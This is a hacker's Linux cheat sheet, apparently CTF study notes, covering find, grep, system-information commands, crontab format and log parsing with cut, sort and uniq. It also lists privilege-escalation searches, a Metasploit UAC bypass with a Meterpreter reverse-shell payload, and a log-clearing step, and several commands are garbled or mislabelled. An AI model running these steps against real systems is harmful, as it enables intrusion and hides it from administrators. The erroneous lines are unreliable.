Linux Basics

Essential Linux for Hackers.

Reference

Finding Files

find / -type f -name pass find -name *.txt 2>/dev/null
find . -writable 2>/dev/null// important to search for priv escallation
find / -perm -4000 *.txt -ls 2>/dev/null \\to view executable binaries
find / -name *.txt -ls 2>/dev/null  to list all text files in system

Locate commad

locate rockyou.txt
sudo updatedb  (essential to make a listing of directories/files)

ls with modified time

ls -t

Find files based on filename

find [directory path] -type f -name [filename]

find /home/Andy -type f -name sales.txt

Find Directory based on directory name

find [directory path] -type d -name [filename]

find /home/Andy -type d -name pictures

Find files based on size

find [directory path] -type f -size [size]

find /home/Andy -type f -size 10c

(c for bytes,

k for kilobytes

M megabytes

G for gigabytes

type:'man find' for full information on the options)

Find files based on username

find [directory path] -type f -user [username]

find /etc/server -type f -user john

Find files based on group name

find [directory path] -type f -group [group name]

find /etc/server -type f -group teamstar

Find files modified after a specific date

find [directory path] -type f -newermt '[date and time]'

find / -type f -newermt '6/30/2020 0:00:00'

(all dates/times after 6/30/2020 0:00:00 will be considered a condition to look for)

Find files based on date modified

find [directory path] -type f -newermt [start date range] ! -newermt [end date range]

find / -type f -newermt 2013-09-12 ! -newermt 2013-09-14

(all dates before 2013-09-12 will be excluded; all dates after 2013-09-14 will be excluded, therefore this only leaves 2013-09-13 as the date to look for.)

Find files based on date accessed

find [directory path] -type f -newerat [start date range] ! -newerat [end date range]

find / -type f -newerat 2017-09-12 ! -newerat 2017-09-14

(all dates before 2017-09-12 will be excluded; all dates after 2017-09-14 will be excluded, therefore this only leaves 2017-09-13 as the date to look for.)

Find files with a specific keyword

grep -iRl [directory path/keyword]

grep -iRl '/folderA/flag'

Ignore only these

grep -v "hello"

read the manual for the find command

man find

man find

check the history of bash

history

SSH key does not work

chmod 600 for SSH key to work

Check Sudo Permissions

sudo -l (tells which programs user can run as root)

Calculate Hash

Sha256sum filename (to compute the hash)

Logs

Linux logs are located in var/log

Important commands

whoami

Displays current username.

id

Returns users identity. Gives other groups the user is part of.

hostname

Sets or prints the name of current host system.

uname -a

Prints basic information about the operating system name and system hardware.

pwd

Returns working directory name.

ifconfig

The ifconfig utility is used to assign or to view an address to a network interface and/or configure network interface parameters.

ip

Ip is a utility to show or manipulate routing, network devices, interfaces and tunnels.

netstat

Shows network status.

ss

Another utility to investigate sockets.

ps

Shows process status.

ps aux

processes by all users

top

real time view of processes

who

Displays who is logged in.

env

Prints environment or sets and executes command.

lsblk

Lists block devices.

lsusb

Lists USB devices

lsof

Lists opened files.

lspci

Lists PCI devices.

wc -l access.log

show no of lines in a file

su

The su utility requests appropriate user credentials via PAM and switches to that user ID (the default user is the superuser). A shell is then executed. su - rocketchat

useradd

Creates a new user or update default new user information.

userdel

Deletes a user account and related files.

usermod

Modifies a user account.

addgroup

Adds a group to the system.

delgroup

Removes a group from the system.

passwd

Changes user password.

lsb_release -a

Current OS version

Start stop service

systemctl stop myservice

  • Start

  • Stop

  • Enable (add to system start up)

  • Disable

Background process

  • ctrl+z

  • add & at the end

  • fg processid

Important Files

File
Directory
Importance

shadow, passwd

/etc

passwords

sudoers

/etc

Sudo permissions

log,backup

/var

/tmp

writable in most of the cases

fail2ban.log, ufw.log,apache

/var/log

important logs

cronjobs

Crontab is one of the processes that is started during boot, which is responsible for facilitating and managing cron jobs.

A crontab is simply a special file with formatting that is recognised by the cron process to execute each line step-by-step. Crontabs require 6 specific values:

Value
Description

MIN

What minute to execute at

HOUR

What hour to execute at

DOM

What day of the month to execute at

MON

What month of the year to execute at

DOW

What day of the week to execute at

CMD

The actual command that will be executed.

crontab generator can be used to generate crontabs.Crontabs can be edited by using crontab -e, where you can select an editor (such as Nano) to edit your crontab.

crontab -l to see running crontabs

Services

Start a service

systemctl start ssh
systemctl status ssh

run a service after start up

systemctl enable ssh

Enumerate services

ps -aux
systemctl list-units --type=service

Access a shared folder

In Network tab press ctrl + L

smb://192.168.1.11

Escalate the privilege

get system
get system -t 1 for using named pipe

Bypass Windows UAC

background the session with ctrl+z

use exploit/windows/local/bypassuac_fodhelper
set SESSION 1
set paypload windows/meterpreter/reverse_tcp
run

Clear logs

clearenv

Cat alternative

if cat command does not work, try head, less, nano, vim. If not use grep

grep . hash.txt
grep -R . // displays all content of all files

Playing with text. Sorting, finding uniques values and cutting the values

# The first use of the cut command retrieves the column of the domain:port, and the second one removes the port by splitting it with a colon.

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1
sway.com
sway.com
sway.office.com
--- REDACTED FOR BREVITY ---

# After retrieving the domains, the sort command arranges the list in alphabetical order

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort
account.activedirectory.windowsazure.com
account.activedirectory.windowsazure.com
account.activedirectory.windowsazure.com
--- REDACTED FOR BREVITY ---

# Lastly, the uniq command removes all the duplicates

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq
account.activedirectory.windowsazure.com
activity.windows.com
admin.microsoft.com
--- REDACTED FOR BREVITY ---

We already have the list of unique domains based on our previous use case. Now, we only need to add some parameters to our commands to get the count of each domain accessed. This can be done by adding the -c option to the uniq command.

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq -c
    423 account.activedirectory.windowsazure.com
    184 activity.windows.com
    680 admin.microsoft.com
    272 admin.onedrive.com
    304 adminwebservice.microsoftonline.com

Moreover, the result can be sorted again based on the count of each domain by using the -n option of the sort command.

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq -c | sort -n
     78 partnerservices.getmicrosoftkey.com
    113 **REDACTED**
    118 ocsp.digicert.com
    123 officeclient.microsoft.com
--- REDACTED FOR BREVITY ---

Based on the result, you can see that the count of connections made for each domain is sorted in ascending order. If you want to make the output appear in descending order, use the -r option. Note that it can also be combined with the -n option (-nr if written together).

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq -c | sort -nr
   4992 www.office.com
   4695 login.microsoftonline.com
   1860 www.globalsign.com
   1581 **REDACTED**
   1554 learn.microsoft.com
--- REDACTED FOR BREVITY --

Last updated